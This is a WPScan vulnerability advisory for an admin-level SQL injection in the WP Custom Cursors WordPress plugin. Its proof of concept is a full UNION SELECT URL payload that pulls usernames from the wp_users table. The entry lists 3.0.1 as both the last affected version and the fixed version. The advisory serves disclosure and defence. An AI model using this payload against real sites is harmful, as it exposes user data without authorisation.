How it works Pricing

Vulnerabilities

WordPress Plugins Themes Stats Submit vulnerabilities

For developers

Status API details CLI scanner

WordPress Plugin Vulnerabilities

WP Custom Cursors <= 3.0.1 - Admin+ SQLi

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privileged users such as admin

Proof of Concept

As admin, open https://example.com/wp-admin/admin.php?page=wpcc_add_new&edit_row=-1+UNION+select+1,1,1,1,user_login,1,1,1,1,1,1,1,1,1,1,1+from+wp_users

Select “Text Cursor”, and the user's name will be in the input field

Affects Plugins

wp-custom-cursors

Fixed in version 3.0.1

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

bb0806d7-21e3-4a65-910c-bf0625c338ec

Timeline

Publicly Published

2022-09-21 (about 8 months ago)

Added

2022-09-21 (about 8 months ago)

Last Updated

2022-10-04 (about 7 months ago)

Our Other Services

WPScan WordPress Security Plugin